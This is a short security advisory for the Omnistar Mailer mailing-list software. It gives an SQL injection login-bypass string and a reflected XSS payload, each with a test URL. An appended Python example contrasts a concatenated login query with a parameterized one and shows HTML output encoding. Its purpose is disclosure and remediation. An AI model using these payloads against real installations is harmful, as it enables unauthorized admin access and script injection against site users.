Title: Omnistar Mailer SQLi Vulnerability
Vendor site: http://www.omnistarmailer.com/
Author: Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
Description:
Are you a business and are you looking to increase your profit? Omnistar mailing list software will
allow you to send campaigns and professional HTML emails to your customers and potential customers in no time at all.
1. Admin authentication flaw
Universal password: ' or 1=1 or ''='
Test URL:
http://www.2cto.com /mailerd4/admin/index.php
2. XSS
Attack pattern: "><script>alert("Sid3^effects")</script>
Test URL: http://www.2cto.com /mailerd4/admin/contacts.php?op=[xss]
Fix: strengthen input validation and filtering
# 0day no more
# Sid3^effects
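Added example (not part of the original advisory and not Omnistar Mailer code): what "strengthen validation, filtering" means in practice for the two flaws above, shown as a concatenated login query next to a parameterized one, and output encoding for the reflected op value. The table layout, the function names, the sample account and the hidden-field context for op are assumptions made for illustration; Python with sqlite3 stands in for the application's PHP and database.

```python
import hashlib
import hmac
import html
import sqlite3

SALT = b"constructed-salt"                        # constructed sample value
SQLI = "' or 1=1 or ''='"                         # string quoted in the advisory
XSS = '"><script>alert("Sid3^effects")</script>'  # string quoted in the advisory

def pw_hash(password):
    # Store and compare a derived hash, never the password itself.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), SALT, 100_000).hex()

def make_db():
    # Hypothetical one-table schema with one constructed admin account.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins (username TEXT, pw_hash TEXT)")
    db.execute("INSERT INTO admins VALUES (?, ?)",
               ("admin", pw_hash("constructed-pass")))
    return db

def login_concatenated(db, username, password):
    # Flawed pattern: the username is pasted into the SQL text, so a quote
    # in it ends the string literal and the rest is parsed as SQL.
    sql = ("SELECT 1 FROM admins WHERE username = '" + username +
           "' AND pw_hash = '" + pw_hash(password) + "'")
    return db.execute(sql).fetchone() is not None

def login_parameterized(db, username, password):
    # Corrected pattern: the value is bound as data and cannot alter the
    # query structure; the hash comparison is constant-time.
    row = db.execute("SELECT pw_hash FROM admins WHERE username = ?",
                     (username,)).fetchone()
    return row is not None and hmac.compare_digest(row[0], pw_hash(password))

def render_op(op):
    # Encode the reflected value for the HTML attribute it is written into.
    return ('<input type="hidden" name="op" value="'
            + html.escape(op, quote=True) + '">')

if __name__ == "__main__":
    db = make_db()
    print("concatenated accepts advisory string:", login_concatenated(db, SQLI, "x"))
    print("parameterized accepts advisory string:", login_parameterized(db, SQLI, SQLI))
    print("encoded op field:", render_op(XSS))
```

Validation of op against a fixed list of expected operation names would be a further layer on top of the encoding; the list itself is not given in the advisory.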